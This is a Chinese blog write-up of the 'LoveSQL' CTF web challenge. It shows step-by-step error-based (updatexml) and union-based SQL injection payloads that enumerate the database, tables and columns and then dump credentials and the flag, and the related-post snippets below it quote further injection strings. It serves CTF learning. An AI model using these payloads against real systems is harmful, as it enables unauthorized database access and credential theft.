极客大挑战loveSQL

最新推荐文章于 2024-10-01 17:33:05 发布
最新推荐文章于 2024-10-01 17:33:05 发布
阅读量426 收藏 5
点赞数 4
文章标签: mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lht2004/article/details/140779439
版权

今天我们来解决一下极客大挑战的lovesql题目

通过输入单引号得到账号和密码都是由单引号包裹

尝试输入一个恒等式,得到账号密码,但并未出现flag,尝试输入账号密码也得到相同页面

之后按照流程开始爆库名  1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

得到库名为  geek

爆表名  1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'geek'),0x7e),1)#

得到表名为  geekuser,l0ve1ysq1

爆列名 1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name='geekuser'),0x7e),1)#

得到列名为  id,username,password

最后爆数据  1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from geekuser),0x7e),1)#

在这里我们会看到我们查询到的数据和最开始查询到的数据相同,但是我们在爆表名的时候一共爆出了两张表名,所以我们可以尝试爆出另一张表名的数据

1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from l0ve1ysq1),0x7e),1)#

显示仅支持常量 XPATH 查询,于是我们换一种查询语句1' union select 1,group_concat(username),group_concat(password) from geek.l0ve1ysq1-- +

成功得到flag,由于页面显示问题我们可以在检查中查看源码得到flag

xcc7
关注
极客挑战 lovesql
偷一个月亮
09-01 151
buuctf 极客挑战 lovesql
SopRomeo的博客
01-17 3548
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
极客挑战LOVESQL
jgmgtdp的博客
07-31 201
首先看到输入框 想到我们的万能密码进入 登陆之后发现了用户信息和密码 之后我们还是要检测有几个列 这里偷懒了,没有使用order by 因为一般都是3列,所以就将usernam的名称改为1’ 导致前面错误,用union select username=1' union select 1,2,3%23 &password =123 之后就显示了出来 开始有想法,把version()和database()输入到2和3里面 这里我们知道了数据库的名称,就可以开始爆破数据表 username=1'
[极客挑战 2019]LoveSQL
weixin_52116519的博客
04-13 1162
考点:常规的sql注入 1、万能密码测试 2、解不了码,没用 3、但是可以注入,测试回显几个字段名,慢慢试 4、爆数据库名和用户名 5、 爆库名 6、爆表名 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 7、爆列名 1' union select 1,2,group_concat(column_name) from inform
[极客挑战 2019]LoveSQL 1
B_cecretary的博客
07-28 413
[极客挑战 2019]LoveSQL 1
[极客挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4991
[极客挑战 2019]LoveSQL 1(SQL注入)
BUU-[极客挑战 2019]LoveSQL 1 --wp
m0_62851980的博客
07-08 1058
知识点:group_concat语法,联合查询(union)1.打开靶机,登录界面我们直接万能密码'or 1=1#登进去试试: 登入进去看到:2. 得到用户名和密码,不过拿去md5没有用,用order by查询字段数: 在增加到4的时候,报错: 3.那就说明一共有3个字段嘛,接下来我们查找回显点位,用union查询测试注入点:4.可以看到注入点为2,3,那么接下来查询数据库名和版本: 5.得到数据库名:geek,接下来我们查询表名: 注:group_concat的使用:得到当前库的所有表 :select g
CTF-Web-[极客挑战 2019]LoveSQL
归子莫的博客
05-03 1852
CTF-Web-[极客挑战 2019]LoveSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到...
[极客挑战 2019]LoveSQL Writeup(超级详细)
StevenOnesir的博客
11-27 2386
今天再讲一道sql的题,同样比较基础,但是相较于前面某道 1’ or 1=1#或者 1’ or ‘1’='1的题来讲要稍好一些。 首先我们玩一玩老套路,绕过登录进去看一看,发现回显: 这行数字,直观看上去像是16进制,转换一下得到: 直观看上去没有什么用 我们试一试常规的注入手段。 payload:union select 出现报错回显: 说明应该没啥过滤,老老实实爆数据库名-表名-字段就行了。 payload:1' union select * from a# 报错回显是: 所以这里相当于直接告诉
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 551
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1202
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 325
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
keepalived+MySQL 5.7编译安装及双活配置
最新发布
听雪楼主
10-01 921
keepalived+MySQL 5.7编译安装及双活配置
MySQLMySQL 数据库主从复制详解
人生苦短,睡觉要紧,睡醒再说。
10-01 1181
MySQL 主从复制是实现高可用性和负载均衡的重要手段。通过合理配置和监控,可以显著提升数据库的可用性和性能,有效地管理数据同步,实现系统的弹性和鲁棒性。在实际应用中,应根据业务需求和系统架构来合理设计部署方案,并定期监控复制状态,以确保数据的一致性和完整性。了解主从复制的工作原理及其配置过程,对数据库管理员至关重要。希望本文能帮助您深入理解 MySQL 主从复制的相关知识。
mysql相关总结】
Charles D
09-30 294
数据库小的表,全表扫描效率更高,不用建索引。索引的类型1.普通索引:基本的索引,没有任何约束限制2.唯一索引:类似普通索引,有唯一约束性3.主键索引:特殊的唯一索引,不允许有空值4.组合索引:多个列组合创建索引5.外键索引:只有innodb可以使用6.全文索引:只有myisam可以使用,且只能对英文进行全文检索注意事项1.复合索引遵循前缀原则(最左匹配原则)2.like查询,%号不能在前面,否则索引失效3.如果or前面的条件有索引,也会失效。
docker容器mysql数据备份 mysql容器无法启动备份数据
zhangxu1998lq的博客
09-30 361
mysql是旧容器名 因为mysql的配置文件my.cnf的路径没有映射到服务器,我修改了配置文件,配置文件有错误导致,容器启动不了,一直restarting。nmysql是新容器名 mysql是旧容器名 mysql:5.7是我的镜像名。新容器正常启动,旧容器的数据都还在。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值